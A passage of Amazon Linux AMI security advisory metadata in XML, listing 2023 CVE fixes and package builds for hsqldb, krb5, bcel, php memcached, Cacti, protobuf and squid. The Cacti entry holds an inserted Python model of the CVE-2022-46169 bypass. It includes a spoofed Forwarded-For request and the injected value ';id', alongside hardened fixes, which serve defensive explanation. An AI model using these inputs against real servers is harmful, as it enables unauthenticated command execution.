arch="x86_64"><filename>Packages/nginx-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.18.0-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1666</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1666: important priority package update for hsqldb</title><issued 
date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41853:
Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41853" title="" id="CVE-2022-41853" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="hsqldb-javadoc" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-javadoc-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package><package name="hsqldb-demo" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-demo-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package><package name="hsqldb" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package><package name="hsqldb-manual" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-manual-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1667</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1667: important priority package update for krb5</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42898:
Integer overflow vulnerabilities in PAC (Privilege Attribute Certificate) parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898" title="" id="CVE-2022-42898" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libkadm5" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-46.49.amzn1.i686.rpm</filename></package><package 
name="krb5-pkinit-openssl" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-46.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1668</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1668: important priority package update for bcel</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42920:
Apache Commons BCEL has a number of APIs that would normally only allow changing specific class characteristics. However, due to an out-of-bounds writing issue, these APIs can be used to produce arbitrary bytecode. This could be abused in applications that pass attacker-controllable data to those APIs, giving the attacker more control over the resulting bytecode than otherwise expected. Update to Apache Commons BCEL 6.6.0.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42920" title="" id="CVE-2022-42920" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bcel-javadoc" version="5.2" release="7.2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/bcel-javadoc-5.2-7.2.10.amzn1.noarch.rpm</filename></package><package name="bcel-manual" version="5.2" release="7.2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/bcel-manual-5.2-7.2.10.amzn1.noarch.rpm</filename></package><package name="bcel" version="5.2" release="7.2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/bcel-5.2-7.2.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1669</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1669: critical priority package update for php-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:21:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to perform CRLF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-pecl-memcached" version="2.1.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-memcached-2.1.0-3.6.amzn1.x86_64.rpm</filename></package><package name="php-pecl-memcached-debuginfo" version="2.1.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-memcached-debuginfo-2.1.0-3.6.amzn1.x86_64.rpm</filename></package><package name="php-pecl-memcached" version="2.1.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-memcached-2.1.0-3.6.amzn1.i686.rpm</filename></package><package name="php-pecl-memcached-debuginfo" version="2.1.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-memcached-debuginfo-2.1.0-3.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1670</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1670: critical priority package update for php54-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:21:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to perform CRLF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pecl-memcached-debuginfo" version="2.1.0" release="3.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-memcached-debuginfo-2.1.0-3.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-memcached" version="2.1.0" release="3.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-memcached-2.1.0-3.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-memcached" version="2.1.0" release="3.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-memcached-2.1.0-3.10.amzn1.i686.rpm</filename></package><package name="php54-pecl-memcached-debuginfo" version="2.1.0" release="3.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-memcached-debuginfo-2.1.0-3.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1671</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1671: critical priority package update for php55-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to perform CRLF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-memcached-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.i686.rpm</filename></package><package name="php55-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-memcached-2.2.0-5.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1672</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1672: critical priority package update for php56-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to perform CRLF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-memcached-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-memcached-2.2.0-5.17.amzn1.i686.rpm</filename></package><package name="php56-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1673</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1673: critical priority package update for php70-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to perform CRLF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-pecl-memcached" version="3.2.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-memcached-3.2.0-1.3.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-memcached-debuginfo" version="3.2.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-memcached-debuginfo-3.2.0-1.3.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-memcached" version="3.2.0" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-memcached-3.2.0-1.3.amzn1.i686.rpm</filename></package><package name="php70-pecl-memcached-debuginfo" version="3.2.0" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-memcached-debuginfo-3.2.0-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1674</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1674: critical priority package update for php71-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to perform CRLF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-pecl-memcached" version="3.2.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-memcached-3.2.0-1.4.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-memcached-debuginfo" version="3.2.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-memcached-debuginfo-3.2.0-1.4.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-memcached-debuginfo" version="3.2.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-memcached-debuginfo-3.2.0-1.4.amzn1.i686.rpm</filename></package><package name="php71-pecl-memcached" version="3.2.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-memcached-3.2.0-1.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1675</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1675: critical priority package update for cacti</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 18:09:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46169:
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. Its authorization check retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks several `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. 
If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. For example, providing `poller_id=;id` causes the `id` command to be executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with a `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a production instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`. This command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these must be kept for compatibility reasons, it should at least not be possible to spoof the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
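The authorization bypass and the command injection described above, modelled as an added example in Python (this is not Cacti's PHP code): the model mirrors a get_client_addr in which any client-settable HTTP_* header overrides REMOTE_ADDR, places a hardened variant beside it that honors forwarding headers only from configured trusted proxies and refuses a forwarded value equal to the server's own address, and contrasts interpolating poller_id into a shell string with integer validation plus an argv list. The server address 10.0.0.5, the proxy 10.0.0.2, the hostname cacti.example.internal, the reverse-DNS table, the request dictionaries and the script name script.php are constructed assumptions.

```python
"""Model of the remote_agent.php checks described for CVE-2022-46169.

Constructed example, not Cacti code: it mirrors the described logic so the
vulnerable behaviour and a hardened variant can be compared side by side.
"""
import ipaddress

# Constructed deployment facts for the model (assumptions, not from the advisory).
SERVER_IP = "10.0.0.5"                      # address of the host running Cacti
TRUSTED_PROXIES = {"10.0.0.2"}              # reverse proxies allowed to set forwarding headers
POLLER_HOSTS = {"cacti.example.internal"}   # hostnames present in the poller table
# Stand-in for gethostbyaddr(): a constructed reverse-DNS table.
REVERSE_DNS = {"10.0.0.5": "cacti.example.internal", "203.0.113.9": "attacker.example"}

# $_SERVER keys populated from request headers; the client controls all of them.
FORWARDING_KEYS = (
    "HTTP_X_FORWARDED_FOR",
    "HTTP_FORWARDED_FOR",
    "HTTP_X_REAL_IP",
    "HTTP_CLIENT_IP",
    "HTTP_FORWARDED",
)


def first_hop(value):
    """Return the first address of a comma-separated forwarding header."""
    return value.split(",")[0].strip()


def get_client_addr_vulnerable(server):
    """Mirrors the flaw: any client-settable HTTP_* header overrides REMOTE_ADDR."""
    for key in FORWARDING_KEYS:
        value = server.get(key)
        if value:
            return first_hop(value)
    return server["REMOTE_ADDR"]


def get_client_addr_hardened(server):
    """Honor forwarding headers only when the TCP peer is a trusted proxy, and
    never let a forwarded value claim the server's own address."""
    peer = server["REMOTE_ADDR"]
    addr = peer
    if peer in TRUSTED_PROXIES:
        for key in FORWARDING_KEYS:
            value = server.get(key)
            if value:
                addr = first_hop(value)
                break
    try:
        ipaddress.ip_address(addr)
    except ValueError:
        return None
    if addr == SERVER_IP and peer != SERVER_IP:
        return None  # a forwarded claim to be the Cacti host itself is spoofed
    return addr


def is_authorized(server, get_client_addr):
    """The poller check: the resolved hostname must exist in the poller table."""
    addr = get_client_addr(server)
    if addr is None:
        return False
    return REVERSE_DNS.get(addr) in POLLER_HOSTS


def build_poller_command_vulnerable(poller_id):
    """Mirrors the flaw: the raw request value is interpolated into the shell
    command string handed to proc_open (script.php is a placeholder name)."""
    return "php -q script.php " + poller_id


def build_poller_command_hardened(poller_id):
    """Validate poller_id as a non-negative integer and return an argv list so
    no shell ever parses the value."""
    if not poller_id.isdigit():
        raise ValueError("poller_id must be an integer")
    return ["php", "-q", "script.php", str(int(poller_id))]


# Constructed requests: the attacker spoofs the server's IP via Forwarded-For.
ATTACK = {"REMOTE_ADDR": "203.0.113.9", "HTTP_FORWARDED_FOR": "10.0.0.5"}
LOCAL_POLLER = {"REMOTE_ADDR": "10.0.0.5"}
SPOOF_VIA_PROXY = {"REMOTE_ADDR": "10.0.0.2", "HTTP_X_FORWARDED_FOR": "10.0.0.5"}

if __name__ == "__main__":
    print("vulnerable authorizes attacker:", is_authorized(ATTACK, get_client_addr_vulnerable))
    print("hardened authorizes attacker:  ", is_authorized(ATTACK, get_client_addr_hardened))
    print("hardened authorizes local:     ", is_authorized(LOCAL_POLLER, get_client_addr_hardened))
    print("vulnerable command:", build_poller_command_vulnerable(";id"))
```

The hardened variant keeps forwarding headers working behind a known proxy, which is the compatibility case the advisory mentions, while closing both paths the attack needs: an untrusted peer cannot override REMOTE_ADDR at all, and even a trusted proxy cannot forward the server's own address. The argv form removes the shell from the poller call entirely, so the remaining validation is defence in depth rather than the only barrier.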
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169" title="" id="CVE-2022-46169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="2.20.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-2.20.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1676</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1676: medium priority package update for protobuf</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22570:
A flaw was found in protobuf. The vulnerability occurs due to incorrect parsing of a NULL character in the proto symbol and leads to a NULL pointer dereference. This flaw allows an attacker to execute unauthorized code or commands, or to read or modify memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22570" title="" id="CVE-2021-22570" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="protobuf-debuginfo" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-debuginfo-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-lite" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-lite-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-devel-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-compiler" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-compiler-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-python26" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-python26-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-python27" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-python27-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-vim" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-vim-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-static-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-lite-devel" version="2.5.0" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/protobuf-lite-devel-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-lite-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-lite-static-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-static-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-lite-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-lite-devel-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-debuginfo" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-debuginfo-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-devel-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-compiler" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-compiler-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-lite-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-lite-static-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-lite" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-lite-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-python27" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-python27-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-vim" version="2.5.0" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/protobuf-vim-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-python26" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-python26-2.5.0-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1677</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1677: important priority package update for squid</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41318:
A flaw was found in Squid. Incorrect integer overflow protection in the Squid SSPI and SMB authentication helpers allows a buffer overflow attack, resulting in information disclosure or a denial of service.
CVE-2021-46784:
In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses.
